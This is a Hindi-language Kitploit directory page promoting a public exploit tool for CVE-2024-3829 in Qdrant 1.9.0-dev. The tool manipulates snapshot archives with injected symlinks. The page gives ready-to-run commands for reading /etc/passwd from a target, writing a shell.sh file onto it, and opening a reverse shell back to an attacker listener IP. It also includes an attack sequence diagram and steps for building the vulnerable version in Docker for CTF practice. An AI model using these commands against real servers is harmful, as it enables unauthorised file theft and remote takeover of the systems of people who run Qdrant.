Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-3829 — CVE-2024-3829 | Kitploit
उपकरण/GitHubGitHub/fabse-hack/cve-2024-3829
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubfabse-hack/cve-2024-3829

CVE-2024-3829

CVE-2024-3829

रिपॉजिटरी देखें
11 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-3829 for Qdrant - एक्सप्लॉइट

root@kitploit:~
 ########################### THIS IS AN EXPLOIT FOR CVE-2024-3829 IN QDRANT 1.9.0-dev ###########################  
 _______  __   __  _______         _______  _______  _______  _   ___         _______   _____   _______  _______   
|       ||  | |  ||       |       |       ||  _    ||       || | |   |       |       | |  _  | |       ||  _    |  
|       ||  |_|  ||    ___| ____  |____   || | |   ||____   || |_|   | ____  |___    | | |_| | |____   || | |   |  
|       ||       ||   |___ |____|  ____|  || | |   | ____|  ||       ||____|  ___|   ||   _   | ____|  || |_|   |  
|      _||       ||    ___|       | ______|| |_|   || ______||___    |       |___    ||  | |  || ______||___    |  
|     |_  |     | |   |___        | |_____ |       || |_____     |   |        ___|   ||  |_|  || |_____     |   |  
|_______|  |___|  |_______|       |_______||_______||_______|    |___|       |_______||_______||_______|    |___|  
  
 ############################################### by fabse-hack.de ###############################################  

यह रिपॉजिटरी CVE-2024-3829 के लिए qdrant/qdrant (v1.9.0-dev) का दस्तावेज़ीकरण और प्रदर्शन करती है।

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-3829
  • इस रिपॉजिटरी के लिए अधिक जानकारी और विचार:
  • Huntr: https://huntr.com/bounties/abd9c906-75ee-4d84-b76d-ce1386401e08
  • incibe: https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-3584
  • GitHub: https://github.com/qdrant/qdrant/commit/15479a45ffa3b955485ae516696f7e933a8cce8a

समर्थन और दान

पेपैल:

मुझे कॉफी खरीदें:

अवलोकन

यह कमजोरी सिमलिंक/पथ ट्रिक्स के माध्यम से स्नैपशॉट आर्काइव में हेरफेर की अनुमति देती है। इससे दो प्रभाव वर्ग और एक रिवर्स शेल hahhaa सक्षम होता है:

  1. फ़ाइल पढ़ना
  2. फ़ाइल लिखना
  3. रिवर्स शेल निष्पादित करें

वातावरण के आधार पर, फ़ाइल-लिखने की प्राइमिटिव कोड निष्पादन की ओर बढ़ सकती हैं।

प्रभावित सॉफ्टवेयर (NVD लिंक पर देखें)

  • उत्पाद: Qdrant
  • संस्करण: 1.9.0-dev
  • घटक: स्नैपशॉट आयात/निर्यात

संस्करण संख्या पर ध्यान दें:

यह संस्करण अब विश्वव्यापी वेब (कुछ लोग इसे "इंटरनेट" कहते हैं) पर उपलब्ध नहीं है।
qdrant रिपॉजिटरी में, NVD Nist रिपोर्ट ने कमिट की ओर इशारा किया, जो कि कमजोर v1.9.0-dev है।
यदि आप इस संस्करण को CTF / अन्य चीजों के लिए डॉकर पर स्थापित करना चाहते हैं, तो उपयोग करें:

root@kitploit:~
git clone https://github.com/qdrant/qdrant.git
cd qdrant
git checkout 15479a45ffa3b955485ae516696f7e933a8cce8a^
docker build -t qdrant:1.9.0-dev-vuln .
docker run -p 6333:6333 qdrant:1.9.0-dev-vuln

कार्यप्रवाह (सरलीकृत)

  1. एक कलेक्शन बनाएँ
  2. एक स्नैपशॉट उत्पन्न करें
  3. स्नैपशॉट को स्थानीय रूप से अनपैक और संशोधित करें
  4. आर्काइव में एक सिमलिंक इंजेक्ट करें पढ़ें/लिखें लक्ष्य
  5. संशोधित स्नैपशॉट अपलोड करें
  6. स्नैपशॉट पुनर्प्राप्ति ट्रिगर करें
  7. परिणाम का मूल्यांकन करें फ़ाइल सामग्री पढ़ें / फ़ाइल लिखें / रिवर्स शेल निष्पादित करें

रिपॉजिटरी सामग्री

  • cve_2024_3829.py - पढ़ने/लिखने/ट्रिगर कार्यप्रवाह के लिए एक्सप्लॉइट
  • requirements.txt - Python निर्भरताएँ

आवश्यकताएँ

  • Kali Linux सिस्टम अनुशंसित
  • Python 3.10+
  • चालू Qdrant सर्वर स्थानीय परीक्षण के लिए
  • Python पैकेज requests

स्थापना:

root@kitploit:~
python3 -m pip install -r requirements.txt

उपयोग

सभी विकल्प दिखाएँ:

root@kitploit:~
python3 cve_2024_3829.py -h

उदाहरण:

root@kitploit:~
# Read mode
python3 cve_2024_3829.py -m read -tu http://target_ip -tp <target_port> -tpath /etc/ -tf passwd

# Write mode
python3 cve_2024_3829.py -m write -tu http://target_ip -tp <target_port> -tpath /tmp/ -apath /tmp/ -af shell.sh

# Reverse shell mode
python3 cve_2024_3829.py -m reverse_shell -tu http://target_ip -tp <target_port> -ai <listener_ip> -ap <listener_port>

उपलब्ध पैरामीटर

  • -h, --help: CLI सहायता दिखाएँ
  • -m, --mode: read, write, reverse_shell में से एक (आवश्यक)
    लक्ष्य पैरामीटर:
  • -tu, --target_url: Qdrant बेस URL (स्क्रिप्ट में डिफ़ॉल्ट)
  • -tp, --target_port: लक्ष्य Qdrant पोर्ट (डिफ़ॉल्ट: 6333)
  • -tpath, --target_path: रिमोट लक्ष्य पथ (डिफ़ॉल्ट: /etc/)

नोट्स

  • --target_url बेस URL होना चाहिए जिसमें पोर्ट न हो यदि आप --target_port अलग से पास करते हैं, क्योंकि स्क्रिप्ट URLs को <url>:<target_port>/... के रूप में बनाती है।
  • read मोड में, स्क्रिप्ट --target_path और --target_file_name को जोड़ती है (उदाहरण के लिए /etc/ + passwd)।
  • write मोड में, --attacker_path को एक मौजूदा स्थानीय फ़ाइल की ओर इशारा करना चाहिए और --attacker_file_name रिमोट फ़ाइल नाम परिभाषित करता है।
  • Docker/WSL/होस्ट सीमाओं के पार नेटवर्क परीक्षणों के लिए, ट्रिगर मोड चलाने से पहले पहुंच क्षमता सत्यापित करें (उदाहरण के लिए netcat से)।
root@kitploit:~
sequenceDiagram
    participant Attacker
    participant Exploit
    participant Target
    participant Listener

    Attacker->>Exploit: Start exploit script
    Exploit->>Listener: Start TCP listener
    Exploit->>Target: Create malicious collection
    Exploit->>Target: Upload trigger script
    Exploit->>Target: Overwrite executable
    Exploit->>Target: Call /stacktrace endpoint
    Target->>Listener: Reverse shell connection
    Listener->>Attacker: Interactive shell access
root@kitploit:~
flowchart TD
    Start[Start Listener]
    Bind[Bind to attacker port]
    Listen[Wait for connection]
    Accept[Accept incoming connection]
    Interactive[Interactive shell session]
    End[Connection closed]

    Start --> Bind
    Bind --> Listen
    Listen --> Accept
    Accept --> Interactive
    Interactive --> End
टूल डाउनलोड करें
  • -tf, --target_file_name: रिमोट लक्ष्य फ़ाइल नाम (डिफ़ॉल्ट: passwd)
    हमलावर पैरामीटर:
  • -ai, --attacker_ip: रिवर्स शेल मोड के लिए कॉलबैक/श्रोता IP
  • -ap, --attacker_port: कॉलबैक/श्रोता पोर्ट (डिफ़ॉल्ट: 9001)
  • -apath, --attacker_path: राइट मोड के लिए स्थानीय हमलावर फ़ाइल पथ (डिफ़ॉल्ट: /tmp/)
  • -af, --attacker_file_name: राइट मोड में लक्ष्य पर उपयोग किया जाने वाला फ़ाइल नाम (डिफ़ॉल्ट: shell.sh)